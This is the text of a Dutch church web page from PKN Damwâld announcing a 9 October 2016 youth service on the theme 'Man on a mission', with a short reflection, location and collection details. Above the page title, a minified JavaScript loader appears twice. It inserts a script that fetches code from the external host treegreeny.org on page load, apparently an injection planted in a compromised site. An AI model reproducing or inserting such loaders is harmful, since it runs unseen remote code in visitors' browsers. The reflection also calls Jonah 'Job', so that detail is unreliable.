;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); YOUNITED jeugkerk - PKN Damwâld
zondag 9 oktober 2016
19:30 uur

YOUNITED jeugkerk

Thema: Man on a mission

Kijk jij ook wel eens ergens tegen op? Job in ieder geval wel. God wilde dat Job naar Nineve toeging, om daar de mensen te bekeren. Maar daar had hij helemaal geen zin in, want de mensen in Nineve waren barbaren! Daar wil je niet naar toe! Job probeert vervolgens om weg te vluchten, maar het lukt hem niet aan God te ontsnappen  Is het in ons leven ook wel niet eens zo? Wij rennen ook wel eens weg van God, maar toch probeert Hij ons steeds weer naar hem toe te brengen. Soms wil je dat op dat moment misschien niet, omdat je andere dingen wil of doet (of meent te moeten doen), maar God laat je niet los en probeert je steeds weer de goede kant op te sturen.  Het belooft weer een mooie dienst te worden!

We zien jullie graag op zondag 9 oktober! Let op: deze dienst begint om 19.30. Na afloop van de dienst staat er een drankje en een hapje klaar in het Honk.

 

youynited-logo-2-nieuw-1024x459

Informatie

Voorganger:Gospelband Lifenote
Thema:Man on a mission
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Goed doel
Tweede collecte: Kerk, eigen middelen
Uitganscollecte: Jeugdkerk